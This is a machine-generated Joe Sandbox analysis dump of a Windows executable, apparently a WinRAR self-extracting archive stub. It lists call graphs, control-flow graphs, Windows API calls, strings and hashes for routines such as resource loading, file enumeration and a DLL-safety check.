22986->22985 22987 a00680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 22986->22987 22987->22985 22988->22976 22989->22976 22991 9ffc39 EnterCriticalSection 22990->22991 22992 9ffca2 22990->22992 22996 9ffc57 22991->22996 22998 9ffc75 22991->22998 22992->22924 22993 9ff9d1 77 API calls 22995 9ffc8f 22993->22995 22994 9ffc98 LeaveCriticalSection 22994->22992 22995->22994 22996->22998 22999 9ff9d1 22996->22999 22998->22993 22998->22994 23000 9ffdc9 72 API calls 22999->23000 23001 9ff9f3 ReleaseSemaphore 23000->23001 23002 9ffa13 23001->23002 23003 9ffa31 DeleteCriticalSection CloseHandle CloseHandle 23001->23003 23004 9ffac7 70 API calls 23002->23004 23003->22998 23005 9ffa1d CloseHandle 23004->23005 23005->23002 23005->23003 23006->22933 23007->22933 23023 a021e6 23008->23023 23010 9fc658 115 API calls 23015 a05995 ___BuildCatchObject __vswprintf_c_l 23010->23015 23011 a05d67 23041 a03ef1 92 API calls __vswprintf_c_l 23011->23041 23013 a05d77 __vswprintf_c_l 23013->22942 23015->23010 23015->23011 23027 9ffa67 23015->23027 23033 a02b3a 115 API calls 23015->23033 23034 a05db9 115 API calls 23015->23034 23035 9ffdc9 23015->23035 23039 a02593 92 API calls __vswprintf_c_l 23015->23039 23040 a063f2 120 API calls __vswprintf_c_l 23015->23040 23021->22942 23022->22942 23025 a021f0 ___std_exception_copy __EH_prolog ___scrt_get_show_window_mode 23023->23025 23024 a022db 23024->23015 23025->23024 23026 9f6e0b 68 API calls 23025->23026 23026->23025 23028 9ffa78 23027->23028 23029 9ffa73 23027->23029 23031 9ffa91 23028->23031 23032 9ffdc9 72 API calls 23028->23032 23030 9ffbb1 77 API calls 23029->23030 23030->23028 23031->23015 23032->23031 23033->23015 23034->23015 23036 9ffe0e 23035->23036 23037 9ffde3 ResetEvent ReleaseSemaphore 23035->23037 23036->23015 23038 9ffac7 70 API calls 23037->23038 23038->23036 23039->23015 23040->23015 23041->23013 23042->22675 23043->22675 23044->22672 23046 9f5da6 23045->23046 23095 9f5cc5 23046->23095 23048 9f5e11 23048->22688 23049 9f5dd9 23049->23048 23051 9f5e1a 23049->23051 23100 9fa950 CharUpperW CompareStringW CompareStringW 23049->23100 23051->23048 23101 9ff0e1 CompareStringW 23051->23101 23055 9f8116 23053->23055 23054 9f81b7 CharUpperW 23056 9f81ca 23054->23056 23055->23054 23056->22691 23058 9f7c20 23057->23058 23059 9f7c60 23058->23059 23107 9f6f49 67 API calls 23058->23107 23059->22699 23061 9f7c58 23108 9f6d0d 67 API calls 23061->23108 23109 9f9897 23063->23109 23066 9f9888 23066->22725 23069 9f9a23 23068->23069 23071 9f9a32 23068->23071 23070 9f9a29 FlushFileBuffers 23069->23070 23069->23071 23070->23071 23072 9f9aab SetFileTime 23071->23072 23072->22754 23073->22679 23074->22681 23075->22687 23076->22699 23077->22699 23078->22696 23079->22712 23080->22703 23081->22712 23083 9f9723 GetFileType 23082->23083 23084 9f9720 23082->23084 23085 9f9731 23083->23085 23084->22719 23085->22719 23086->22722 23087->22724 23088->22749 23089->22749 23090->22749 23091->22749 23092->22748 23093->22750 23094->22705 23102 9f5bc2 23095->23102 23097 9f5ce6 23097->23049 23099 9f5bc2 3 API calls 23099->23097 23100->23049 23101->23048 23105 9f5bcc 23102->23105 23103 9f5cb4 23103->23097 23103->23099 23105->23103 23106 9fa950 CharUpperW CompareStringW CompareStringW 23105->23106 23106->23105 23107->23061 23108->23059 23110 9f987d 23109->23110 23113 9f98a3 23109->23113 23110->23066 23114 9f9b6a SetEndOfFile 23110->23114 23111 9f98da SetFilePointer 23111->23110 23112 9f98f8 GetLastError 23111->23112 23112->23110 23113->23111 23114->23066 23117 9fa27d 23116->23117 23118 9fa30d FindNextFileW 23117->23118 23119 9fa29b FindFirstFileW 23117->23119 23121 9fa32c 23118->23121 23122 9fa318 GetLastError 23118->23122 23120 9fa2b4 23119->23120 23127 9fa2f1 23119->23127 23123 9fb275 2 API calls 23120->23123 23121->23127 23122->23121 23124 9fa2cd 23123->23124 23125 9fa2e6 GetLastError 23124->23125 23126 9fa2d1 FindFirstFileW 23124->23126 23125->23127 23126->23125 23126->23127 23127->22628 23137 a08adf GetDC GetDeviceCaps ReleaseDC 23128->23137 23130 a08ac7 23131 a08ad3 23130->23131 23138 a08b22 GetDC GetDeviceCaps ReleaseDC 23130->23138 23131->22460 23131->22461 23133->22464 23134->22471 23135->22471 23136->22473 23137->23130 23138->23131 23139->22480 23141 9f9ba2 67 API calls 23140->23141 23142 9f1ee9 23141->23142 23143 9f19b1 90 API calls 23142->23143 23146 9f1eed 23142->23146 23144 9f1efa 23143->23144 23144->23146 23147 9f6d0d 67 API calls 23144->23147 23146->22489 23146->22490 23147->23146 23913 a17ede 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23829 a10052 RaiseException 23851 a0d553 46 API calls 6 library calls 23831 9f1067 75 API calls pre_c_initialization 23777 a0cd5c 23778 a0cd66 23777->23778 23779 a0cabc ___delayLoadHelper2@8 19 API calls 23778->23779 23780 a0cd73 23779->23780 23852 a0995f 104 API calls 23853 a0955f 71 API calls

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 009FF353: GetModuleHandleW.KERNEL32 ref: 009FF36B
                                                                                                        • Part of subcall function 009FF353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009FF383
                                                                                                        • Part of subcall function 009FF353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009FF3A6
                                                                                                        • Part of subcall function 00A08B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00A08B96
                                                                                                        • Part of subcall function 00A09036: OleInitialize.OLE32(00000000), ref: 00A0904F
                                                                                                        • Part of subcall function 00A09036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A09086
                                                                                                        • Part of subcall function 00A09036: SHGetMalloc.SHELL32(00A320E8), ref: 00A09090
                                                                                                        • Part of subcall function 00A00722: GetCPInfo.KERNEL32(00000000,?), ref: 00A00733
                                                                                                        • Part of subcall function 00A00722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00A00747
                                                                                                      • GetCommandLineW.KERNEL32 ref: 00A0C179
                                                                                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00A0C1A0
                                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00A0C1B1
                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00A0C1EB
                                                                                                        • Part of subcall function 00A0BE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00A0BE20
                                                                                                        • Part of subcall function 00A0BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A0BE5C
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A0C1F4
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00A47938,00000800), ref: 00A0C20F
                                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00A47938), ref: 00A0C221
                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00A0C228
                                                                                                      • _swprintf.LIBCMT ref: 00A0C267
                                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A0C279
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00A0C27C
                                                                                                      • LoadIconW.USER32(00000000,00000064), ref: 00A0C293
                                                                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 00A0C2E4
                                                                                                      • Sleep.KERNEL32(?), ref: 00A0C312
                                                                                                      • DeleteObject.GDI32 ref: 00A0C351
                                                                                                      • DeleteObject.GDI32(?), ref: 00A0C35D
                                                                                                        • Part of subcall function 00A0A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 00A0A92C
                                                                                                        • Part of subcall function 00A0A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 00A0A953
                                                                                                      • CloseHandle.KERNEL32 ref: 00A0C39C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                      • API String ID: 985665271-3710569615
                                                                                                      • Opcode ID: 7714877af8961283cf3e153957e7baada6aa274d3d6bcc7b99ca0118903e1162
                                                                                                      • Instruction ID: 1697cca927d06da029f313cffdec3c0e74086d2dbbb09a373e647c7f6472450b
                                                                                                      • Opcode Fuzzy Hash: 7714877af8961283cf3e153957e7baada6aa274d3d6bcc7b99ca0118903e1162
                                                                                                      • Instruction Fuzzy Hash: FB61E471904308AFD320EBE8FD45F7B7BA8AB99710F004529F941971E2DB789D46C7A2

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 598 a08bd0-a08beb FindResourceW 599 a08bf1-a08c03 SizeofResource 598->599 600 a08cc6-a08cc8 598->600 601 a08c23-a08c25 599->601 602 a08c05-a08c14 LoadResource 599->602 604 a08cc5 601->604 602->601 603 a08c16-a08c21 LockResource 602->603 603->601 605 a08c2a-a08c3f GlobalAlloc 603->605 604->600 606 a08c41-a08c4a GlobalLock 605->606 607 a08cbf-a08cc4 605->607 608 a08cb8-a08cb9 GlobalFree 606->608 609 a08c4c-a08c6a call a0e000 CreateStreamOnHGlobal 606->609 607->604 608->607 612 a08cb1-a08cb2 GlobalUnlock 609->612 613 a08c6c-a08c84 call a08b65 609->613 612->608 613->612 617 a08c86-a08c8e 613->617 618 a08c90-a08ca4 GdipCreateHBITMAPFromBitmap 617->618 619 a08ca9-a08cad 617->619 618->619 620 a08ca6 618->620 619->612 620->619
                                                                                                      APIs
                                                                                                      • FindResourceW.KERNELBASE(00000066,PNG,?,?,00A09AC8,00000066), ref: 00A08BE1
                                                                                                      • SizeofResource.KERNEL32(00000000,75295780,?,?,00A09AC8,00000066), ref: 00A08BF9
                                                                                                      • LoadResource.KERNEL32(00000000,?,?,00A09AC8,00000066), ref: 00A08C0C
                                                                                                      • LockResource.KERNEL32(00000000,?,?,00A09AC8,00000066), ref: 00A08C17
                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00A09AC8,00000066), ref: 00A08C35
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A08C42
                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A08C62
                                                                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A08C9D
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A08CB2
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00A08CB9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                                      • String ID: PNG
                                                                                                      • API String ID: 3656887471-364855578
                                                                                                      • Opcode ID: 9e6a68212ce2b04bc404a3658f1a3f2232b12c195ea48a2f4a02637d14ee54db
                                                                                                      • Instruction ID: 457640d26e7756777c7ab0d209d6753b833fb69616878f7fac40d9640cd28b6f
                                                                                                      • Opcode Fuzzy Hash: 9e6a68212ce2b04bc404a3658f1a3f2232b12c195ea48a2f4a02637d14ee54db
                                                                                                      • Instruction Fuzzy Hash: 92218171502619AFD731DF65ED49D3BBBB8EF45791B040538F881822A1DB39CC02CAA0

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 860 9fa273-9fa299 call a0cec0 863 9fa30d-9fa316 FindNextFileW 860->863 864 9fa29b-9fa2ae FindFirstFileW 860->864 867 9fa32c-9fa32e 863->867 868 9fa318-9fa326 GetLastError 863->868 865 9fa334-9fa3dd call 9ff10e call 9fb902 call a001c1 * 3 864->865 866 9fa2b4-9fa2cf call 9fb275 864->866 871 9fa3e2-9fa3f5 865->871 875 9fa2e6-9fa2ef GetLastError 866->875 876 9fa2d1-9fa2e4 FindFirstFileW 866->876 867->865 867->871 868->867 878 9fa2f1-9fa2f4 875->878 879 9fa300 875->879 876->865 876->875 878->879 881 9fa2f6-9fa2f9 878->881 882 9fa302-9fa308 879->882 881->879 884 9fa2fb-9fa2fe 881->884 882->871 884->882
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,009FA16E,000000FF,?,?), ref: 009FA2A8
                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,009FA16E,000000FF,?,?), ref: 009FA2DE
                                                                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,009FA16E,000000FF,?,?), ref: 009FA2E6
                                                                                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,009FA16E,000000FF,?,?), ref: 009FA30E
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,009FA16E,000000FF,?,?), ref: 009FA31A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$ErrorFirstLast$Next
                                                                                                      • String ID:
                                                                                                      • API String ID: 869497890-0
                                                                                                      • Opcode ID: 9891f443951da379b8a1294eb35e4b1f1f07a0be6f91491fef051e34b654aaef
                                                                                                      • Instruction ID: 0aa9b27450e22c718dcea099a4f795170328d52beb11dd11d3b4e672a8482512
                                                                                                      • Opcode Fuzzy Hash: 9891f443951da379b8a1294eb35e4b1f1f07a0be6f91491fef051e34b654aaef
                                                                                                      • Instruction Fuzzy Hash: 734146B1608249AFC324DF64C884AEEF7E8BB49350F004A2AF6D9D3241D774A9558B92
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,?,00A14A30,?,00A27F68,0000000C,00A14B87,?,00000002,00000000), ref: 00A14A7B
                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00A14A30,?,00A27F68,0000000C,00A14B87,?,00000002,00000000), ref: 00A14A82
                                                                                                      • ExitProcess.KERNEL32 ref: 00A14A94
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: a1d927c8ccc4e065138c81495980a78379cf1cf58d10a075d5b8f8efd3d52e10
                                                                                                      • Instruction ID: 6ed63017575fba51f04b497c2046587280b06e071f8076ea3d2edc30264a218d
                                                                                                      • Opcode Fuzzy Hash: a1d927c8ccc4e065138c81495980a78379cf1cf58d10a075d5b8f8efd3d52e10
                                                                                                      • Instruction Fuzzy Hash: DBE0B631045508AFCF21AFA8EE09E993B6AEF54782F020424F8099A522CB35DDD3CB84
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F840E
                                                                                                      • _memcmp.LIBVCRUNTIME ref: 009F8870
                                                                                                        • Part of subcall function 009F80F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,009F86E9,?,-00000930,?), ref: 009F81BB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharH_prologUpper_memcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 4047935103-0
                                                                                                      • Opcode ID: e8a8323d9664d69023ccf6465c23b17a057e8ec311e552d6f0cff1bccba614a0
                                                                                                      • Instruction ID: 2c52bf02b00e5ed25390d1b9d1e9f7d99946788f4642399525c8c4ffb90a8945
                                                                                                      • Opcode Fuzzy Hash: e8a8323d9664d69023ccf6465c23b17a057e8ec311e552d6f0cff1bccba614a0
                                                                                                      • Instruction Fuzzy Hash: E7721B7150418DAEDF65DF64C885BFBBBADAF05300F0841BAEE599B182DF309A85C760
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: 9b094ec17f27ad6b6118621398e2f7987dd97ac99e85ba55ff15fd209cc89751
                                                                                                      • Instruction ID: b0fe1f2d15e4cdf841fa5237e6b0a41f184c3649ad026c964d442d8e948757f6
                                                                                                      • Opcode Fuzzy Hash: 9b094ec17f27ad6b6118621398e2f7987dd97ac99e85ba55ff15fd209cc89751
                                                                                                      • Instruction Fuzzy Hash: 80D1F3B1A047498FDB14CF38E88475BBBE0BF95308F08056DE8459B682D734E959CF96
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00A09B54
                                                                                                        • Part of subcall function 009F12E7: GetDlgItem.USER32(00000000,00003021), ref: 009F132B
                                                                                                        • Part of subcall function 009F12E7: SetWindowTextW.USER32(00000000,00A202E4), ref: 009F1341
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prologItemTextWindow
                                                                                                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                      • API String ID: 810644672-2803697902
                                                                                                      • Opcode ID: 06610d121e0d65d801ef263859d4e516ff53346d694721801a1e79563c512204
                                                                                                      • Instruction ID: e2e38fbd25fa86f432a2983f4f8ec607f0589a5e2cef3596c1709415c36342bd
                                                                                                      • Opcode Fuzzy Hash: 06610d121e0d65d801ef263859d4e516ff53346d694721801a1e79563c512204
                                                                                                      • Instruction Fuzzy Hash: 9D42D271A4434DBFEB21EBA4BD4AFFE3B68AB66700F004065F641A60D2C7754D46CB62

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 257 9ff353-9ff375 call a0cec0 GetModuleHandleW 260 9ff3c8-9ff62f 257->260 261 9ff377-9ff38e GetProcAddress 257->261 262 9ff6fd-9ff72e GetModuleFileNameW call 9fb88c call 9ff10e 260->262 263 9ff635-9ff640 call a1462a 260->263 264 9ff3a0-9ff3aa GetProcAddress 261->264 265 9ff390-9ff39d 261->265 277 9ff730-9ff73a call 9fa8e0 262->277 263->262 272 9ff646-9ff673 GetModuleFileNameW CreateFileW 263->272 264->260 268 9ff3ac-9ff3c3 264->268 265->264 268->260 275 9ff675-9ff683 SetFilePointer 272->275 276 9ff6f1-9ff6f8 CloseHandle 272->276 275->276 278 9ff685-9ff6a2 ReadFile 275->278 276->262 283 9ff73c-9ff740 call 9ff309 277->283 284 9ff747 277->284 278->276 280 9ff6a4-9ff6c9 278->280 282 9ff6e6-9ff6ef call 9fef07 280->282 282->276 292 9ff6cb-9ff6e5 call 9ff309 282->292 289 9ff745 283->289 287 9ff749-9ff74b 284->287 290 9ff76d-9ff78f call 9fb902 GetFileAttributesW 287->290 291 9ff74d-9ff76b CompareStringW 287->291 289->287 294 9ff791-9ff795 290->294 299 9ff799 290->299 291->290 291->294 292->282 294->277 296 9ff797 294->296 300 9ff79d-9ff7a2 296->300 299->300 301 9ff7d6-9ff7d8 300->301 302 9ff7a4 300->302 304 9ff7de-9ff7f5 call 9fb8d6 call 9fa8e0 301->304 305 9ff8e5-9ff8ef 301->305 303 9ff7a6-9ff7c8 call 9fb902 GetFileAttributesW 302->303 310 9ff7ca-9ff7ce 303->310 311 9ff7d2 303->311 315 9ff85d-9ff890 call 9f3f5b AllocConsole 304->315 316 9ff7f7-9ff858 call 9ff309 * 2 call 9fd142 call 9f3f5b call 9fd142 call a08ccb 304->316 310->303 314 9ff7d0 310->314 311->301 314->301 321 9ff8dd-9ff8df ExitProcess 315->321 322 9ff892-9ff8d7 GetCurrentProcessId AttachConsole call a120b3 GetStdHandle WriteConsoleW Sleep FreeConsole 315->322 316->321 322->321
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32 ref: 009FF36B
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009FF383
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009FF3A6
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 009FF651
                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009FF669
                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 009FF67B
                                                                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00A20858,00000000), ref: 009FF69A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 009FF6F2
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 009FF708
                                                                                                      • CompareStringW.KERNEL32(00000400,00001001,00A208A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 009FF762
                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00A20870,00000800,?,00000000,?,00000800), ref: 009FF78B
                                                                                                      • GetFileAttributesW.KERNEL32(?,?,00A20930,00000800), ref: 009FF7C4
                                                                                                        • Part of subcall function 009FF309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009FF324
                                                                                                        • Part of subcall function 009FF309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FDEC8,Crypt32.dll,?,009FDF4A,?,009FDF2E,?,?,?,?), ref: 009FF346
                                                                                                      • _swprintf.LIBCMT ref: 009FF834
                                                                                                      • _swprintf.LIBCMT ref: 009FF880
                                                                                                        • Part of subcall function 009F3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F3F6E
                                                                                                      • AllocConsole.KERNEL32 ref: 009FF888
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 009FF892
                                                                                                      • AttachConsole.KERNEL32(00000000), ref: 009FF899
                                                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 009FF8BF
                                                                                                      • WriteConsoleW.KERNEL32(00000000), ref: 009FF8C6
                                                                                                      • Sleep.KERNEL32(00002710), ref: 009FF8D1
                                                                                                      • FreeConsole.KERNEL32 ref: 009FF8D7
                                                                                                      • ExitProcess.KERNEL32 ref: 009FF8DF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                      • API String ID: 1201351596-3298887752
